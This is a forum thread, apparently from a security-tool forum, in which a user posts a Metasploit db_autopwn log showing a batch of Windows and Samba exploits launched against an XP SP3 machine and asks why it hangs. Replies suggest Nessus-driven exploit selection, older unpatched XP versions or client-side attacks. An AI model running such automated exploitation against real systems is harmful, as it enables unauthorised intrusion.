Results 1 to 3 of 3

Thread: db_autopwn -p -t -e

  1. #1
    Just burned his ISO virusc's Avatar
    Join Date
    Feb 2009

    Cool db_autopwn -p -t -e

    i used db_autopwn -p -t -e
    and it frooze on last line (log below)
    msf > db_autopwn -p -t -e[*] Analysis completed in 46.086333990097 seconds (0 vulns / 0 refs)[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against[*] Matched exploit/windows/smb/ms06_066_nwwks against[*] (3/34): Launching exploit/windows/smb/ms06_066_nwwks against[*] Matched exploit/windows/smb/ms04_011_lsass against[*] (4/34): Launching exploit/windows/smb/ms04_011_lsass against
    [*] Connecting to the SMB service...[*] Started bind handler[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against[*] Started bind handler[*] Matched auxiliary/dos/windows/smb/ms09_001_write against[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against[*] Matched exploit/windows/smb/ms06_040_netapi against[*] (8/34): Launching exploit/windows/smb/ms06_040_netapi against[*] Started bind handler[*] Matched exploit/windows/smb/psexec against[*] (9/34): Launching exploit/windows/smb/psexec against[*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:[\nwwks] ...[*] Started bind handler[*] Connecting to the server...[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:[\lsarpc]...[*] Matched exploit/windows/smb/ms05_039_pnp against[*] Authenticating as user 'Administrator'...[*] (10/34): Launching exploit/windows/smb/ms05_039_pnp against
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Matched exploit/windows/smb/ms04_007_killbill against[*] Started bind handler
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)[*] Connecting to the SMB service...[*] Matched exploit/windows/smb/ms06_025_rras against[*] Windows XP SP2 is not exploitable[*] Matched exploit/windows/smb/ms04_031_netdde against[*] (13/34): Launching exploit/windows/smb/ms04_031_netdde against[*] Matched exploit/windows/smb/ms03_049_netapi against[*] Started bind handler[*] (14/34): Launching exploit/windows/smb/ms03_049_netapi against[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser] ...[*] Started bind handler[*] Matched exploit/windows/brightstor/etrust_itm_alert against[*] (15/34): Launching exploit/windows/brightstor/etrust_itm_alert against[*] Started bind handler[*] Matched auxiliary/dos/samba/lsa_transnames_heap against[*] Matched exploit/windows/smb/msdns_zonename against[*] (17/34): Launching exploit/windows/smb/msdns_zonename against[*] Trying target Windows 2000 SP4...[*] Binding to 2f5f3220-c126-1076-b549-074d078619da:1.2@ncacn_np:[\nddeapi][*] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:[\BROWSER] ...
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Started bind handler[*] Matched exploit/osx/samba/lsa_transnames_heap against[*] (18/34): Launching exploit/osx/samba/lsa_transnames_heap against
    [-] Exploit failed: Could not bind to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser][*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:[\alert] ...[*] Matched auxiliary/scanner/smb/login against
    [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Matched exploit/netware/smb/lsass_cifs against[*] (20/34): Launching exploit/netware/smb/lsass_cifs against[*] Detected a Windows XP system...[*] There is no available target for this OS locale[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:[\BROWSER] ...[*] Matched auxiliary/admin/db2/db2rcmd against[*] Building the stub data...[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against[*] Calling the vulnerable function...[*] Matched exploit/windows/dcerpc/ms03_026_dcom against[*] (24/34): Launching exploit/windows/dcerpc/ms03_026_dcom against[*] Matched exploit/multi/samba/nttrans against[*] (25/34): Launching exploit/multi/samba/nttrans against[*] Started bind handler[*] Matched auxiliary/scanner/dcerpc/management against[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...[*] Matched exploit/windows/smb/ms08_067_netapi against[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...[*] (27/34): Launching exploit/windows/smb/ms08_067_netapi against[*] Started bind handler[*] Matched exploit/linux/samba/lsa_transnames_heap against[*] Sending exploit ...
    [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against[*] Matched exploit/windows/smb/ms06_066_nwapi against[*] (30/34): Launching exploit/windows/smb/ms06_066_nwapi against[*] Automatically detecting the target...
    [-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/solaris/samba/lsa_transnames_heap against[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against[*] Matched exploit/solaris/samba/trans2open against[*] (33/34): Launching exploit/solaris/samba/trans2open against[*] Matched exploit/osx/samba/trans2open against
    msf >[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...
    any ideas why it freezes here plz ppl ?

  2. #2
    Just burned his ISO
    Join Date
    Apr 2009


    It could be that the exploit was just taking a while to run. Honestly though, don't use db_autopwn to fling exploits at the target. It's just impractical and only good if your doing it on your local network. Instead, try using Nessus against the target to generate a report and then load the report into the Metasploit db (db_import_nessus_nbe) and use db_autopwn -t -x for it to only show you the exploits instead of actually exploiting it.

  3. #3
    Join Date
    Jan 2010
    The new forums


    How long did you let it hang? Sometimes db_autopwn is running multiple exploits and takes a while to complete them. Also from another thread you mentioned you just wanted to get "remote access" to a PC without making any changes to it. If you are using XP SP3 you probably are not going to hit anything from Metasploit. Try using a fresh copy of XP SP0 - SP2, or add some 3rd party programs to exploit. If you don't want to try that then I recommend setting up a client side attack.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts